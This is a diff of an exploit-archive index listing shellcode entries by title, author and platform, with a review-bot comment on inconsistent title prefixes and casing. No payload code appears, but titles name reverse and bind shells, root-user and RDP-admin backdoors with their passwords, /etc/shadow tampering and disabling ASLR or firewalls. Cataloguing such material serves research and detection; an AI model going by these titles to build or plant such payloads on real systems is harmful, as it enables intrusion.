-47052,shellcodes/arm/47052.c,"Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47052,shellcodes/arm/47052.c,"Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (140 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47053,shellcodes/arm/47053.c,"Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47054,shellcodes/arm/47054.c,"Linux/ARM64 - Egghunter (PWN!PWN!) + execve(_/bin/sh__ NULL_ NULL) + mprotect() Shellcode (88 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
-47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
-47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47055,shellcodes/arm/47055.c,"Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) + mmap() + read() Stager Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47056,shellcodes/arm/47056.c,"Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) + Jump Back Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
-47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
+47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) Using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
 47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86
 47151,shellcodes/linux_x86-64/47151.c,"Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)",2019-07-23,"Kağan Çapar",shellcode,linux_x86-64
-47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64
-47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
-47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64
+47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47201,shellcodes/linux_x86/47201.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
 47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
 47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
 47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
 47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
 47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
 47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
-47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - execve(_/bin/sh_) + AVX2 XOR Decoder Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
 47296,shellcodes/linux/47296.c,"Linux/MIPS64 - Reverse (localhost:4444/TCP) Shell Shellcode (157 bytes)",2019-08-20,antonio,shellcode,linux
-47352,shellcodes/linux_x86/47352.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)",2019-09-05,guly,shellcode,linux_x86
-47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86
-47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86
+47352,shellcodes/linux_x86/47352.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (107 Bytes)",2019-09-05,guly,shellcode,linux_x86
+47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind (43690/TCP) + Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86
+47461,shellcodes/linux_x86/47461.c,"Linux/x86 - execve(/bin/sh) + NOT + XOR-N + Random Encoded Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86
 47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm
-47481,shellcodes/linux_x86/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux_x86
-47511,shellcodes/linux_x86/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
-47513,shellcodes/linux_x86/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
-47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
-47530,shellcodes/linux_x86/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux_x86
-47564,shellcodes/linux_x86/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux_x86
-47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
-47877,shellcodes/linux_x86/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux_x86
-47890,shellcodes/linux_x86/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux_x86
-47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
+47481,shellcodes/linux_x86/47481.c,"Linux/x86 - Add Root User (vl43ck/test) To /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux_x86
+47511,shellcodes/linux_x86/47511.c,"Linux/x86 - adduser (User) To /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
+47513,shellcodes/linux_x86/47513.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
+47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
+47530,shellcodes/linux_x86/47530.txt,"Linux/x86 - execve(/bin/sh) Socket Reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux_x86
+47564,shellcodes/linux_x86/47564.py,"Linux/x86 - execve(/bin/sh) + NOT|ROT+8 Encoded + Null-Free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux_x86
+47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Free Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
+47877,shellcodes/linux_x86/47877.c,"Linux/x86 - execve() + Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux_x86
+47890,shellcodes/linux_x86/47890.c,"Linux/x86 - execve(/bin/sh) + Random Bytes Encoder + XOR/SUB/NOT/ROR Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux_x86
+47953,shellcodes/windows_x86-64/47953.c,"Windows/x64 (7) - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows_x86-64
 47980,shellcodes/windows_x86/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows_x86
 48032,shellcodes/linux_x86/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux_x86
-48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
+48116,shellcodes/windows_x86/48116.c,"Windows/x86 - WinExec Calc.exe + Null-Free Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
 48229,shellcodes/windows_x86-64/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows_x86-64
-48243,shellcodes/linux_x86/48243.txt,"Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux_x86
+48243,shellcodes/linux_x86/48243.txt,"Linux/x86 - Reboot + Polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux_x86
 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
-48355,shellcodes/windows_x86/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows_x86
-48379,shellcodes/linux_x86-64/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux_x86-64
-48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
+48355,shellcodes/windows_x86/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-Free + Add RDP Admin (MajinBuu/TurnU2C@ndy!!) + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows_x86
+48379,shellcodes/linux_x86-64/48379.c,"Linux/x64 - Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Password (P3WP3Wl4ZerZ) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux_x86-64
+48585,shellcodes/arm/48585.c,"Linux/ARM - execve(/bin/dash) Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
 48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
-48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
+48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
-48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
+48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
 49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
diff --git a/shellcodes/windows/47953.c b/shellcodes/windows_x86-64/47953.c
similarity index 100%
rename from shellcodes/windows/47953.c
rename to shellcodes/windows_x86-64/47953.c
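Review bot: Two rewritten rows in the `@@ -952,77 +952,77 @@` hunk still break the conventions the hunk applies elsewhere: the new title for 47183 starts with `Linux/x86` although its path and platform column are both `linux_x86-64`, and the new title for 48379 keeps `Null-free` while 48355, 47352, 47514 and 47784 are normalised to `Null-Free`. Anyone who filters this index by title prefix or by tag, for example to map catalogued payloads to per-platform detection coverage, will miss or misfile these entries. If the file path is the authoritative value, which I cannot confirm from the hunk, the 47183 title would read `Linux/x86_64 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)` and 48379 would end `+ Null-Free Shellcode (272 Bytes)`. The untouched context row 49416 shows the same disagreement (`Linux/x86` in the title against `linux` in the platform column) and could be settled in the same pass.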